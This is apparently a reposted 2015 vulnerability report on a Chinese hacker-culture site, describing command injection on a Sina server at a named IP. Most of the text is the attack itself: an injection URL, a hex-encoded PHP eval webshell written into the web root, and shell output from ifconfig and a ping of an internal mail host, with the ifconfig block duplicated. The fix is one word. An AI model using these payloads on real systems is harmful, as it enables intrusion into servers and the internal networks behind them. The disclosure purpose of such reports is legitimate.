记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

新浪某处代码执行getshell直入内网

2015-12-11 02:30

 

http://61.135.152.231/webtrans/index.php?controller=user&action=login
 

1111.png



http://61.135.152.231/SetTime/index.php?time=%27set%7cset%26set%27
 

1111.png



set处存在代码执行
 

1111.png



pwd

写入shell


61.135.152.231//SetTime/index.php?time='set;echo+3C3F706870206576616C28245F504F53545B635D293B3F3E|xxd+-r+-ps+>/var/www/webbak/template/1.php;ls+'



http://61.135.152.231/webbak/template/1.php c


[/var/www/webbak/template/]$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7c
inet addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224
inet6 addr: fe80::ec4:7aff:fe08:7c7c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5017795 errors:0 dropped:0 overruns:0 frame:0
TX packets:2704480 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1182610202 (1.1 GB) TX bytes:326898975 (326.8 MB)
Memory:f7200000-f7280000

eth1 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7d
inet addr:192.168.1.145 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Memory:f7100000-f7180000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:680777 errors:0 dropped:0 overruns:0 frame:0
TX packets:680777 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:756699997 (756.6 MB) TX bytes:756699997 (756.6 MB)



[/var/www/webbak/template/]$ ping -c 1 mail.staff.sina.com.cn
PING mail.staff.sina.com.cn (10.210.97.18) 56(84) bytes of data.
64 bytes from bogon (10.210.97.18): icmp_req=1 ttl=252 time=0.113 ms

--- mail.staff.sina.com.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.113/0.113/0.113/0.000 ms


[/var/www/webbak/template/]$

[/var/www/webbak/template/]$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7c
inet addr:61.135.152.231 Bcast:61.135.152.255 Mask:255.255.255.224
inet6 addr: fe80::ec4:7aff:fe08:7c7c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:5017795 errors:0 dropped:0 overruns:0 frame:0
TX packets:2704480 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1182610202 (1.1 GB) TX bytes:326898975 (326.8 MB)
Memory:f7200000-f7280000

eth1 Link encap:Ethernet HWaddr 0c:c4:7a:08:7c:7d
inet addr:192.168.1.145 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Memory:f7100000-f7180000

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:680777 errors:0 dropped:0 overruns:0 frame:0
TX packets:680777 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:756699997 (756.6 MB) TX bytes:756699997 (756.6 MB)



[/var/www/webbak/template/]$ ping -c 1 mail.staff.sina.com.cn
PING mail.staff.sina.com.cn (10.210.97.18) 56(84) bytes of data.
64 bytes from bogon (10.210.97.18): icmp_req=1 ttl=252 time=0.113 ms

--- mail.staff.sina.com.cn ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.113/0.113/0.113/0.000 ms


[/var/www/webbak/template/]$

 

解决方案:

过滤


知识来源: www.2cto.com/Article/201512/453014.html

阅读:145283 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪某处代码执行getshell直入内网”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云

本页关键词